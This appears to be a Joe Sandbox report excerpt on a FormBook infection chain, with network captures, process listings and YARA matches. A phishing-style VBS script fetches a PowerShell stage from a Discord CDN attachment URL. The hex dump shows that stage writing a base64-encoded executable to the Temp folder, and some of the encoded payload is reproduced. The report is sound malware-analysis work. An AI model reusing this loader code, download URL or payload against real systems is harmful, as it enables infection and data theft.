                                                  Dec 13, 2024 07:51:06.329695940 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.329720974 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.329731941 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.329758883 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.337089062 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.337136030 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.337205887 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.337218046 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.337229013 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.337260962 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.344698906 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.344748020 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.344794989 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.344804049 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.344829082 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.344845057 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.350610971 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.350662947 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.350701094 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.350711107 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.350723028 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.350752115 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.350794077 CET44349730162.159.129.233192.168.2.4
                                                  Dec 13, 2024 07:51:06.350847960 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.351030111 CET49730443192.168.2.4162.159.129.233
                                                  Dec 13, 2024 07:51:06.351047039 CET44349730162.159.129.233192.168.2.4
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 13, 2024 07:51:03.490262985 CET6013353192.168.2.41.1.1.1
                                                  Dec 13, 2024 07:51:03.628057003 CET53601331.1.1.1192.168.2.4
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Dec 13, 2024 07:51:03.490262985 CET192.168.2.41.1.1.10x6905Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Dec 13, 2024 07:51:03.628057003 CET1.1.1.1192.168.2.40x6905No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                  Dec 13, 2024 07:51:03.628057003 CET1.1.1.1192.168.2.40x6905No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                  Dec 13, 2024 07:51:03.628057003 CET1.1.1.1192.168.2.40x6905No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                  Dec 13, 2024 07:51:03.628057003 CET1.1.1.1192.168.2.40x6905No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                  Dec 13, 2024 07:51:03.628057003 CET1.1.1.1192.168.2.40x6905No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                  • cdn.discordapp.com
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.449730162.159.129.233443416C:\Windows\System32\wscript.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-13 06:51:04 UTC475OUTGET /attachments/1295304757166080020/1316923696224669696/fore.ps1?ex=675cd044&is=675b7ec4&hm=5608089203d1f55754eb42ae1b19e52da07e426935e063abf1f2bb096cfc394e& HTTP/1.1
                                                  Accept: */*
                                                  Accept-Language: en-ch
                                                  UA-CPU: AMD64
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                  Host: cdn.discordapp.com
                                                  Connection: Keep-Alive
                                                  2024-12-13 06:51:05 UTC1201INHTTP/1.1 200 OK
                                                  Date: Fri, 13 Dec 2024 06:51:05 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Content-Length: 449316
                                                  Connection: close
                                                  CF-Ray: 8f14060d2ade0f51-EWR
                                                  CF-Cache-Status: HIT
                                                  Accept-Ranges: bytes, bytes
                                                  Age: 21862
                                                  Cache-Control: public, max-age=31536000
                                                  Content-Disposition: attachment; filename="fore.ps1"
                                                  ETag: "a71b01ef9fb1e8252d07f776432a39de"
                                                  Expires: Sat, 13 Dec 2025 06:51:05 GMT
                                                  Last-Modified: Fri, 13 Dec 2024 00:24:36 GMT
                                                  Vary: Accept-Encoding
                                                  alt-svc: h3=":443"; ma=86400
                                                  x-goog-generation: 1734049476512190
                                                  x-goog-hash: crc32c=7z0DpA==
                                                  x-goog-hash: md5=pxsB75+x6CUtB/d2Qyo53g==
                                                  x-goog-metageneration: 1
                                                  x-goog-storage-class: STANDARD
                                                  x-goog-stored-content-encoding: identity
                                                  x-goog-stored-content-length: 449316
                                                  x-guploader-uploadid: AFiumC7UqaPF9CMePP4QGABNr4LazNBPnKpHX8BHHefornBFbaZ1m0mSk6UMJjfW_c-IGrqla0c
                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                  Set-Cookie: __cf_bm=pxnEIo9hxUKZ3OXt1j5gLBrMXhs0wLFroQ.5e8sX8L4-1734072665-1.0.1.1-qBjYlSli2WyVkE9.gDN0x_rYZzvdCZDlCajlB_fEeD4_K2q5orYHdA3rseeoMwj7tn_rdsw8Z9eLI4tVGdrjNg; path=/; expires=Fri, 13-Dec-24 07:21:05 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                  2024-12-13 06:51:05 UTC517INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 53 35 53 54 62 53 5a 61 43 43 57 31 65 25 32 46 6f 6f 76 25 32 46 4f 62 73 6a 57 55 63 61 7a 6a 79 61 6d 46 47 50 25 32 42 6e 4e 69 70 68 78 61 69 32 36 55 49 61 6b 58 63 50 6a 65 58 25 32 46 49 30 69 51 67 55 39 61 38 69 36 6e 78 6d 63 59 55 34 61 38 68 4a 63 59 36 67 5a 4f 72 79 71 54 63 67 4f 34 6d 67 78 6c 41 66 63 79 30 43 76 6f 31 44 57 52 35 53 68 35 53 69 4d 53 4b 5a 62 32 57 41 32 65 7a 77 73 4d 48 75 35 76 69 41 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65
                                                  Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S5STbSZaCCW1e%2Foov%2FObsjWUcazjyamFGP%2BnNiphxai26UIakXcPjeX%2FI0iQgU9a8i6nxmcYU4a8hJcY6gZOryqTcgO4mgxlAfcy0Cvo1DWR5Sh5SiMSKZb2WA2ezwsMHu5viA%3D%3D"}],"group":"cf-nel","max_age
                                                  2024-12-13 06:51:05 UTC1369INData Raw: 24 70 3d 5b 49 4f 2e 50 61 74 68 5d 3a 3a 43 6f 6d 62 69 6e 65 28 24 65 6e 76 3a 54 45 4d 50 2c 22 78 2e 65 78 65 22 29 0d 0a 5b 49 4f 2e 46 69 6c 65 5d 3a 3a 57 72 69 74 65 41 6c 6c 42 79 74 65 73 28 24 70 2c 5b 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75
                                                  Data Ascii: $p=[IO.Path]::Combine($env:TEMP,"x.exe")[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUu
                                                  2024-12-13 06:51:05 UTC1369INData Raw: 2f 50 4a 4a 6b 61 65 66 68 7a 51 7a 50 41 52 4f 34 4b 58 7a 65 4f 70 71 67 69 36 7a 55 39 4e 76 2b 6e 71 67 39 31 4c 4f 76 69 57 75 37 66 4f 65 51 6c 68 49 39 70 66 38 54 2f 65 51 48 30 6d 36 33 68 45 71 72 38 67 68 38 30 69 4c 7a 6f 6c 36 73 61 7a 70 6a 38 41 77 47 41 36 51 4b 4f 36 76 64 2b 47 6e 75 47 6e 69 6e 4d 77 63 70 72 6e 37 62 4c 49 5a 32 38 70 50 69 62 56 70 72 6e 69 52 67 5a 71 41 48 30 69 54 5a 59 4d 4e 6d 4f 58 49 6c 44 39 31 52 65 44 73 68 74 70 67 59 77 62 37 6e 2f 68 35 69 33 6b 41 73 6c 41 74 4e 55 33 61 74 71 41 58 53 34 54 43 6a 70 4d 78 55 45 51 79 78 62 4a 78 54 62 34 62 6d 62 5a 2b 63 48 52 44 58 46 69 4b 34 37 55 4c 66 48 79 75 6b 6c 69 65 37 34 56 63 71 65 76 52 67 2b 7a 48 34 69 4b 2f 54 37 31 71 54 37 54 4e 76 36 2b 6d 5a 68 2f
                                                  Data Ascii: /PJJkaefhzQzPARO4KXzeOpqgi6zU9Nv+nqg91LOviWu7fOeQlhI9pf8T/eQH0m63hEqr8gh80iLzol6sazpj8AwGA6QKO6vd+GnuGninMwcprn7bLIZ28pPibVprniRgZqAH0iTZYMNmOXIlD91ReDshtpgYwb7n/h5i3kAslAtNU3atqAXS4TCjpMxUEQyxbJxTb4bmbZ+cHRDXFiK47ULfHyuklie74VcqevRg+zH4iK/T71qT7TNv6+mZh/
                                                  2024-12-13 06:51:05 UTC1369INData Raw: 32 34 45 6a 4b 55 55 44 41 49 30 51 6e 5a 73 31 43 49 6a 53 56 46 49 75 6a 58 4b 42 59 36 67 54 4a 37 5a 2b 63 56 4a 70 6b 62 5a 33 68 34 4c 36 6c 52 49 4e 64 65 56 37 6e 5a 4e 2b 74 59 71 38 74 64 69 42 37 2b 2b 7a 42 4c 7a 77 6c 5a 41 49 34 69 66 36 4a 66 2f 54 39 46 76 33 53 41 54 61 75 77 6e 77 54 33 56 79 42 44 69 4a 71 66 59 52 33 61 56 7a 50 67 71 6a 6e 4f 34 4c 61 32 33 65 54 6e 64 57 41 71 47 65 43 65 75 75 50 31 56 35 77 51 61 5a 65 66 43 44 79 65 64 70 48 72 6b 74 35 43 45 79 32 34 61 4e 39 4c 5a 2f 44 63 64 30 2b 57 30 72 79 41 73 74 48 38 39 6b 54 35 74 2f 39 75 33 7a 78 58 6c 6d 30 51 30 6d 74 6e 2b 56 64 4e 72 71 39 6e 47 39 68 61 52 4a 64 76 69 6c 6a 36 43 44 38 64 4b 6d 49 2b 7a 63 36 62 61 76 64 4e 59 51 52 65 54 59 38 57 67 52 42 39 4d
                                                  Data Ascii: 24EjKUUDAI0QnZs1CIjSVFIujXKBY6gTJ7Z+cVJpkbZ3h4L6lRINdeV7nZN+tYq8tdiB7++zBLzwlZAI4if6Jf/T9Fv3SATauwnwT3VyBDiJqfYR3aVzPgqjnO4La23eTndWAqGeCeuuP1V5wQaZefCDyedpHrkt5CEy24aN9LZ/Dcd0+W0ryAstH89kT5t/9u3zxXlm0Q0mtn+VdNrq9nG9haRJdvilj6CD8dKmI+zc6bavdNYQReTY8WgRB9M
                                                  2024-12-13 06:51:05 UTC1369INData Raw: 63 4c 4a 51 4b 54 70 6b 51 56 62 4a 66 72 4a 4f 38 56 65 38 41 61 70 76 77 2f 4d 71 7a 45 53 71 5a 78 54 39 4d 31 6f 38 61 73 31 2b 79 69 31 7a 4a 48 6d 79 6e 76 30 6c 79 79 73 4a 32 6f 5a 6b 34 6b 67 54 52 2b 34 30 68 31 53 61 35 4e 71 7a 62 74 72 38 4f 64 6b 2f 47 76 50 38 72 59 48 49 54 53 43 49 39 78 63 49 79 2f 6e 58 35 53 4d 39 6b 79 6e 69 4d 41 36 46 50 50 49 50 30 76 66 39 74 61 46 76 4c 77 38 6a 61 4d 70 34 77 6f 50 73 6a 4b 77 47 77 67 71 79 6c 76 70 78 74 38 63 71 78 77 70 5a 34 51 68 4f 31 37 64 69 63 41 39 6f 66 56 47 46 65 68 73 42 54 6f 76 74 70 4c 76 39 65 53 35 59 75 53 73 51 4b 46 4d 71 67 7a 65 37 41 61 59 68 39 59 52 4c 35 61 73 4f 58 31 6c 78 73 44 33 66 64 4f 41 62 51 2b 68 63 4c 61 78 31 4a 38 58 31 57 73 68 45 51 6d 38 74 38 53 35
                                                  Data Ascii: cLJQKTpkQVbJfrJO8Ve8Aapvw/MqzESqZxT9M1o8as1+yi1zJHmynv0lyysJ2oZk4kgTR+40h1Sa5Nqzbtr8Odk/GvP8rYHITSCI9xcIy/nX5SM9kyniMA6FPPIP0vf9taFvLw8jaMp4woPsjKwGwgqylvpxt8cqxwpZ4QhO17dicA9ofVGFehsBTovtpLv9eS5YuSsQKFMqgze7AaYh9YRL5asOX1lxsD3fdOAbQ+hcLax1J8X1WshEQm8t8S5
                                                  2024-12-13 06:51:05 UTC1369INData Raw: 62 37 65 6f 73 76 58 2f 43 53 41 61 37 47 53 51 4a 71 65 4e 35 41 45 6e 73 59 6a 63 2f 45 47 54 45 39 4c 44 6f 76 35 65 34 6e 6f 48 74 35 36 4f 5a 4d 4a 77 62 71 4c 64 77 57 6f 50 50 6f 77 43 46 49 65 2b 79 72 45 5a 74 51 63 67 6f 71 66 67 6b 47 63 49 54 44 4f 70 6d 50 57 55 59 56 72 55 57 76 2f 78 64 79 55 33 30 6b 76 48 75 2b 6f 58 51 46 43 6a 4e 36 72 47 62 52 59 74 78 57 38 4f 46 35 33 33 31 34 56 78 31 6b 6c 66 33 6c 42 43 7a 4a 46 4b 44 36 32 39 49 62 6e 7a 4d 75 6c 49 41 66 6b 4a 71 35 65 48 76 6d 5a 37 63 58 70 56 36 2f 76 78 79 45 71 4e 45 2b 72 62 2b 70 2f 47 79 70 53 49 37 39 74 2b 70 31 61 6a 51 55 72 57 62 66 77 6b 70 6b 39 64 62 51 31 6e 4f 63 78 6a 59 47 44 76 4b 75 53 50 4b 79 71 56 6a 47 7a 6a 58 30 6d 78 4b 31 37 6d 72 69 67 4a 39 54 61
                                                  Data Ascii: b7eosvX/CSAa7GSQJqeN5AEnsYjc/EGTE9LDov5e4noHt56OZMJwbqLdwWoPPowCFIe+yrEZtQcgoqfgkGcITDOpmPWUYVrUWv/xdyU30kvHu+oXQFCjN6rGbRYtxW8OF53314Vx1klf3lBCzJFKD629IbnzMulIAfkJq5eHvmZ7cXpV6/vxyEqNE+rb+p/GypSI79t+p1ajQUrWbfwkpk9dbQ1nOcxjYGDvKuSPKyqVjGzjX0mxK17mrigJ9Ta
                                                  2024-12-13 06:51:05 UTC1369INData Raw: 66 4a 2f 6f 61 39 6f 2b 5a 2f 66 4b 73 6e 42 77 71 6c 6a 2b 54 46 38 70 4f 78 31 37 53 55 48 38 4e 4c 37 53 42 46 74 66 43 4b 4b 58 74 6e 46 64 63 73 66 6b 35 30 35 2f 6d 49 76 41 32 56 66 4d 30 69 42 72 35 51 50 46 30 6c 30 42 34 71 6a 4e 2f 4b 52 4f 66 32 4a 64 6e 48 65 79 41 59 49 46 74 32 7a 5a 62 31 62 74 72 39 45 63 6e 2f 6d 43 73 6d 4e 4d 59 73 54 53 6d 47 6e 5a 79 73 67 61 77 38 70 46 67 6d 6c 67 4d 56 64 39 65 31 30 68 58 32 4e 79 61 67 56 46 41 67 64 50 46 77 4f 68 48 4b 52 4e 66 50 33 4a 68 46 6f 72 48 7a 33 31 78 6f 33 46 30 34 51 68 36 6d 68 35 62 4a 47 78 6b 73 69 6b 4c 4e 72 30 58 56 6c 78 50 4f 6a 72 73 35 37 7a 65 6e 66 31 7a 30 71 4c 6b 62 34 2b 50 2f 66 57 70 74 48 55 43 4d 49 55 4c 49 78 4a 76 63 64 6a 54 35 75 72 71 52 79 50 44 77 6d
                                                  Data Ascii: fJ/oa9o+Z/fKsnBwqlj+TF8pOx17SUH8NL7SBFtfCKKXtnFdcsfk505/mIvA2VfM0iBr5QPF0l0B4qjN/KROf2JdnHeyAYIFt2zZb1btr9Ecn/mCsmNMYsTSmGnZysgaw8pFgmlgMVd9e10hX2NyagVFAgdPFwOhHKRNfP3JhForHz31xo3F04Qh6mh5bJGxksikLNr0XVlxPOjrs57zenf1z0qLkb4+P/fWptHUCMIULIxJvcdjT5urqRyPDwm
                                                  2024-12-13 06:51:05 UTC1369INData Raw: 75 55 67 6d 39 34 35 78 36 65 46 41 73 78 61 42 6c 6d 68 37 42 43 53 57 70 31 2b 56 35 42 69 65 53 47 62 44 50 52 36 4f 62 55 46 62 50 4c 4b 5a 5a 69 35 6b 4d 62 57 6a 31 6e 6c 43 64 4c 59 74 4c 53 73 57 2b 68 56 71 47 42 5a 57 30 2f 73 41 69 6d 6f 78 6f 4d 65 4e 6f 58 67 76 51 48 2b 6f 2f 43 33 62 6a 76 71 67 6d 4e 54 68 51 6e 41 77 74 31 61 6f 39 64 6e 65 5a 44 4c 53 35 61 42 65 44 30 51 39 49 59 6a 6e 50 6c 78 44 73 6e 6c 33 2b 33 69 6f 67 49 54 4c 4c 79 6a 54 6a 6b 62 4a 68 50 74 4c 50 51 65 4e 51 73 67 36 33 4b 75 35 63 2b 78 54 59 78 33 2f 4d 55 71 4d 65 6a 72 32 44 41 55 42 49 76 71 36 69 34 2f 47 36 59 6d 44 4c 68 70 34 50 4a 70 57 41 76 78 79 4e 48 35 5a 4f 71 4d 56 35 2b 38 74 63 61 6f 48 71 39 62 36 59 79 59 71 75 4b 33 6d 77 76 62 37 31 69 76
                                                  Data Ascii: uUgm945x6eFAsxaBlmh7BCSWp1+V5BieSGbDPR6ObUFbPLKZZi5kMbWj1nlCdLYtLSsW+hVqGBZW0/sAimoxoMeNoXgvQH+o/C3bjvqgmNThQnAwt1ao9dneZDLS5aBeD0Q9IYjnPlxDsnl3+3iogITLLyjTjkbJhPtLPQeNQsg63Ku5c+xTYx3/MUqMejr2DAUBIvq6i4/G6YmDLhp4PJpWAvxyNH5ZOqMV5+8tcaoHq9b6YyYquK3mwvb71iv
                                                  2024-12-13 06:51:05 UTC1369INData Raw: 68 56 78 2f 77 4c 6f 63 72 6e 64 43 4d 6d 4d 34 35 61 65 37 56 54 4c 41 6d 74 46 35 46 4e 32 53 76 57 58 6a 76 46 5a 4a 4c 31 66 34 67 33 35 61 50 46 47 37 55 74 32 51 4a 72 68 61 51 4a 33 31 41 6d 4c 51 31 4f 45 47 2b 32 38 30 45 75 4b 50 42 36 6f 67 50 31 57 6b 53 35 6b 4e 34 62 46 4f 46 43 37 58 58 6d 74 2f 30 63 6a 69 69 36 47 45 31 51 79 67 77 67 59 65 79 4b 58 54 7a 35 2f 4f 41 69 49 55 44 31 72 69 44 72 39 49 43 37 70 32 55 6c 79 78 4f 6b 30 63 44 33 31 6f 74 49 71 6c 2f 6c 4b 79 73 67 33 62 70 4e 77 59 4c 4d 32 33 58 74 43 42 68 74 2b 6e 79 4f 76 6a 34 31 75 59 4b 7a 42 67 43 53 36 46 54 71 4c 42 33 31 75 61 35 6b 6a 48 33 71 6d 62 4e 52 62 58 75 34 39 64 61 58 6d 53 69 54 6c 37 65 79 4b 54 49 55 69 4f 6b 71 56 35 7a 39 4b 74 50 31 4b 6a 31 58 51
                                                  Data Ascii: hVx/wLocrndCMmM45ae7VTLAmtF5FN2SvWXjvFZJL1f4g35aPFG7Ut2QJrhaQJ31AmLQ1OEG+280EuKPB6ogP1WkS5kN4bFOFC7XXmt/0cjii6GE1QygwgYeyKXTz5/OAiIUD1riDr9IC7p2UlyxOk0cD31otIql/lKysg3bpNwYLM23XtCBht+nyOvj41uYKzBgCS6FTqLB31ua5kjH3qmbNRbXu49daXmSiTl7eyKTIUiOkqV5z9KtP1Kj1XQ
                                                  2024-12-13 06:51:05 UTC1369INData Raw: 73 65 30 77 71 30 2b 4e 4c 78 2f 44 49 47 69 6f 65 67 34 4b 59 6f 69 70 6a 72 34 72 73 47 53 71 4f 43 61 4b 70 58 59 63 62 57 7a 47 77 37 58 49 45 39 74 6f 55 30 4c 30 41 6e 54 47 56 72 37 61 59 54 49 34 62 6a 73 63 66 35 48 53 57 48 54 6f 62 63 37 4f 56 6f 30 6c 56 6a 71 76 2f 6f 34 74 74 36 52 2b 4e 70 53 62 56 35 74 48 4e 56 39 69 7a 41 4a 73 73 73 2f 46 45 7a 76 2b 68 6a 73 53 42 78 74 50 64 4a 6d 56 44 4c 32 66 46 6f 67 48 7a 6d 56 6d 52 49 4b 41 38 76 72 4a 67 65 50 66 41 6e 39 51 67 63 76 45 4b 53 46 4e 6b 6c 6d 47 34 61 44 71 6e 47 4c 6c 63 42 68 69 39 2b 4e 6d 61 33 78 57 55 46 53 67 79 7a 57 2f 50 42 4d 35 63 43 37 69 76 5a 78 76 76 6d 62 68 32 56 50 6b 42 6a 58 4a 6b 59 35 6d 67 79 50 35 6a 2f 78 36 76 61 2f 54 70 43 49 67 44 2b 6e 34 6a 6a 39
                                                  Data Ascii: se0wq0+NLx/DIGioeg4KYoipjr4rsGSqOCaKpXYcbWzGw7XIE9toU0L0AnTGVr7aYTI4bjscf5HSWHTobc7OVo0lVjqv/o4tt6R+NpSbV5tHNV9izAJsss/FEzv+hjsSBxtPdJmVDL2fFogHzmVmRIKA8vrJgePfAn9QgcvEKSFNklmG4aDqnGLlcBhi9+Nma3xWUFSgyzW/PBM5cC7ivZxvvmbh2VPkBjXJkY5mgyP5j/x6va/TpCIgD+n4jj9


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:01:51:02
                                                  Start date:13/12/2024
                                                  Path:C:\Windows\System32\wscript.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_11171111221.Vbs.vbs"
                                                  Imagebase:0x7ff6a62c0000
                                                  File size:170'496 bytes
                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:1
                                                  Start time:01:51:05
                                                  Start date:13/12/2024
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
                                                  Imagebase:0x7ff788560000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:01:51:05
                                                  Start date:13/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:01:51:07
                                                  Start date:13/12/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                  Imagebase:0x7ff7699e0000
                                                  File size:336'896 bytes
                                                  MD5 hash:3A4DEEB8FD959AF313C23032D971093E
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:01:51:07
                                                  Start date:13/12/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                  Imagebase:0xc0000
                                                  File size:56'368 bytes
                                                  MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:01:51:07
                                                  Start date:13/12/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                  Imagebase:0x600000
                                                  File size:56'368 bytes
                                                  MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1996937641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1997479679.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:8
                                                  Start time:01:51:25
                                                  Start date:13/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Reset < >
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1783596865.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b6b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: eca6cef7b057cee4d902e83b8a2a8133f06433f0614e2aeb6d208794e54a8029
                                                    • Instruction ID: fc11bac6d14911c727277b6ebe7fd5123e5ca93b43a1e3d44c18e74718aaa382
                                                    • Opcode Fuzzy Hash: eca6cef7b057cee4d902e83b8a2a8133f06433f0614e2aeb6d208794e54a8029
                                                    • Instruction Fuzzy Hash: 7C416B32B1DA2D0FEFB8965DA4321B977E1EF84710F05017BD42EC71A6DE14BA0246C1
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1783596865.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b6b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 33be4562ceedcb112dfd5f41c89a260aae443647bcff03b8c6c11aa14a563ddc
                                                    • Instruction ID: f1eabbdf58bed8cd87876e2888958765538b7be6e37922dfbb2b09b4d4cca0c2
                                                    • Opcode Fuzzy Hash: 33be4562ceedcb112dfd5f41c89a260aae443647bcff03b8c6c11aa14a563ddc
                                                    • Instruction Fuzzy Hash: 41112B22F1F92E4BEEBC924E54761B926E1EF94710B46017AE42DCB1E2DE187F0146C1
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1782186266.00007FFD9B5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b5e0000_powershell.jbxd
